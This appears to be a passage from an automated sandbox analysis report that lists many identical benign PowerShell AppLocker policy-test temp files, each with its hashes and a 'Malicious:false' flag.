                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_os0wjchr.yfq.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ovcfnjb4.t1l.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ovel4dbd.l55.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oybhpax3.mmd.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pux3sflk.j4h.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzgixvy1.g43.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qiooack5.kgs.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfrb23ny.yzu.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rh2ivgvc.pnq.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rq4l3vsx.ewz.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s33n5igt.3lv.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3baqrsb.n4e.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sf5tuofz.ces.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slmykqye.psz.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4fpjqhj.zch.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvpsui2b.flc.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0ygg5hp.ffz.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ungqcbij.ifm.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vkynnq14.kae.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrpexgfb.zdj.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvusab2p.s4m.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnscpesa.33w.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrzbpfap.pot.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xx4i3a2l.mte.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y1ciq1vy.hua.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
